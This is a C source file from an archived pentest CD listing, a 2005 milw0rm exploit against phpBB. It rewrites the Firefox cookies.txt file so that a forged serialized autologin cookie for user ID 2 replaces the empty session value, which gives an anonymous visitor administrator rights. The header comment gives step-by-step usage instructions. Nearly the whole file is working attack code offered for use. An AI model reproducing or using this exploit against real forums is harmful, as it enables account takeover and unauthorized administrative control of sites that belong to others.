home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / 897.c < prev    next >
C/C++ Source or Header  |  2005-03-29  |  2KB  |  78 lines
  1. /* Paisterist's code was nice but heres mil's version.
  2.  * precompiled: http://www.milw0rm.com/sploits/897.rar
  3.  * Usage: 
  4.  * bcc32 897.cpp
  5.  * and place the exe in your firefox profile dir.
  6.  * Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
  7.  * Visit a site with phpbb, close the browser, double click the exe, browse site.
  8.  * This gives anonymous users administrator rights only.
  9.  * Ya its lame im bored kthnx. If something goes wrong clear cookies.
  10.  * 
  11.  * /str0ke
  12.  */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <string.h>
  17.  
  18. //Taken from VeNoMouS's love cow code
  19. char *search_and_replace (char *text, char *find, char *replace)
  20. {
  21. char *found,*new_text;
  22. int
  23. len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;
  24.  
  25. if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
  26.        {
  27.        printf("malloc issue...\n");
  28.        return new_text;
  29.        }
  30. found = strstr(text, find);
  31. while (i <= len_text)
  32. {
  33. if ( found != text + i )
  34.        {
  35.        new_text[j] = text[i];
  36.        i++;
  37.        j++;
  38.        }
  39.        else
  40.        {
  41.            strcat (new_text, replace);
  42.            i += len_find;
  43.            j += len_replace;
  44.            found = strstr (text + i, find);
  45.        }
  46.        new_text[j] = '\0';
  47. }
  48. return new_text;
  49. }
  50.  
  51. int main()
  52. {
  53.   FILE * pFile;
  54.   long lSize;
  55.   char * buffer;
  56.  
  57.   pFile = fopen ( "cookies.txt" , "r" );
  58.   if (pFile==NULL) exit (1);
  59.  
  60.   fseek (pFile , 0 , SEEK_END);
  61.   lSize = ftell (pFile);
  62.   rewind (pFile);
  63.  
  64.   buffer = (char*) malloc (lSize);
  65.   if (buffer == NULL) exit (2);
  66.   fread (buffer,1,lSize,pFile);
  67.   fclose (pFile);
  68.  
  69.   pFile = fopen ( "cookies.txt" , "w" );
  70.   fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
  71.   fclose (pFile);
  72.   free (buffer);
  73.   return 0;
  74.  
  75. }
  76.  
  77. // milw0rm.com [2005-03-24]
  78.